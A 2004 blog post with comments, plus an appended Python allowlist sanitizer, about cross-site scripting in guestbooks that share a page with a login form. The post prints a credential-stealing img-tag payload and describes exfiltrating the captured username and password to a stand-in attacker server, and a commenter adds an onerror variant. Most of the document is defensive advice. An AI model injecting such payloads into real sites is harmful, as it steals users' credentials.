Remove login pages to a separate page!

I looked around the web for websites with security leaks. After months there is no change on the webmasters' side: they still offer login textboxes side by side with guestbooks or weblogs. Some weeks ago I posted a sample of how to get JavaScript executed on a website with a mouseover, but that one was not very good...

Today I will show code that gets the username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if it accepts HTML; it does not have to allow <SCRIPT> tags:

<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

Now, when the page is shown, the onreadystatechange event fires (note: trans.gif must exist on that website; it can be replaced by any other image!). We assign a new function as the form's submit handler. When you click submit (that is, log in), a message box appears showing your credentials. It is very easy to load a second image from your server instead, with the credentials as additional arguments, like http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.

I have created this small script to show you how easy it still is to get user credentials.

To be secure, put the login form on a separate page!!!

If you need assistance to prevent such security leaks, go to http://www.schwarz-interactive.de to get help.

Published Tuesday, April 06, 2004 11:42 PM by Michael Schwarz

Comments

# re: Remove login pages to a separate page!

Tuesday, April 06, 2004 5:47 PM by Phil Scott
Of course, you could encode the messages so that it isn't interpreted as html, which you should be doing anyways on a guestbook or something similar (i.e. this comments box)

# re: Remove login pages to a separate page!

Tuesday, April 06, 2004 5:56 PM by Jerry Pisk
But a lot of forums do not encode, and allow [some] html tags to be included.

Btw if you want to be safe and use an image that doesn't exist just use the onerror event handler.

# re: Remove login pages to a separate page!

Tuesday, April 06, 2004 6:04 PM by Phil Scott
If a forum doesn't know enough to encode, I doubt if they've ever even begun to think about cross site scripting attacks :)

# re: Remove login pages to a separate page!

Tuesday, April 06, 2004 6:11 PM by David Cumps
Right, you'd be surprised to see the number of people out there who make these mistakes over and over, like they have been living under a rock for years.

Just take a look at http://www.claroline.net, it seems good, it comes from a university and is used world-wide, yet it's full of holes, one of them being allowing HTML about everywhere...

# re: Remove login pages to a separate page!

Wednesday, April 07, 2004 12:56 AM by Michael Schwarz
@Phil Scott: Yes, you can encode your messages, but sometimes you want to allow html fragments. I would say if you filter the message that there is no SCRIPT tag and all events are destroyed it can be safe.

# re: Remove login pages to a separate page!

Wednesday, April 07, 2004 4:04 PM by David Cumps
It is not safe when you filter out harmful constructs.
It is safe when you allow safe constructs.
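The allowlist approach the thread ends on, as an added example that is not part of the original post or any of the comments: a Python sanitizer built on the standard library's html.parser that keeps only tags and attributes named in an explicit allowlist, so an event-handler attribute such as the onreadystatechange in the post's payload is dropped on its way into the guestbook rather than looked up in a list of "harmful" names. The tag and attribute allowlist, the constant POSTED_PAYLOAD (the payload from the post, used as test input) and the sanitize function are constructed for this example.

```python
"""Allowlist HTML sanitizer for user-submitted guestbook entries.

Added example, not code from the original post or its comments. A tag or
attribute survives only if it is explicitly allowed, so every on* event
handler (onreadystatechange, onerror, onmouseover, ...) is removed by
construction instead of by a deny-list that has to name each one.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: tag -> attributes allowed on that tag.
ALLOWED_TAGS = {
    "b": set(), "i": set(), "em": set(), "strong": set(), "p": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
}
VOID_TAGS = {"br", "img"}                 # never get a closing tag
URL_ATTRS = {"href", "src"}               # values must carry a safe scheme
ALLOWED_SCHEMES = {"http", "https", ""}   # "" = relative URL such as /trans.gif
DROP_WITH_CONTENT = {"script", "style"}   # the tag and its whole body go away

# The payload posted above, kept here as the sanitizer's test input.
POSTED_PAYLOAD = (
    '<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit='
    "new Function('alert(\\'Website hacked: \\'+document.forms[0].username.value"
    "+\\'|\\'+document.forms[0].password.value);');\" width=1 height=1>"
)


def _safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other non-web scheme."""
    return urlparse(value.strip()).scheme.lower() in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed, non-void tags currently open
        self.drop_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return            # unknown tag: unwrap it, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue      # on* handlers never pass this check
            value = "" if value is None else value
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> and <img/> behave like start tags

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open_tags:
            return
        # Close everything opened after this tag too, so the output nests properly.
        while self.open_tags:
            closed = self.open_tags.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))   # re-escape text

    def result(self) -> str:
        self.close()
        while self.open_tags:   # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    """Return a version of fragment containing only allowlisted markup."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()


if __name__ == "__main__":
    print("before:", POSTED_PAYLOAD)
    print("after: ", sanitize(POSTED_PAYLOAD))
```

Run on the posted payload, the img tag comes out as `<img src="/trans.gif" width="1" height="1">`: the event handler is gone because it was never in the allowlist, not because a filter recognised it. The scheme check on href and src is what stops javascript: links, and dropping script and style with their bodies keeps inline code from surviving as text. Whether to allow img at all is a policy decision for the site; the sanitizer complements, and does not replace, the post's advice to put the login form on its own page.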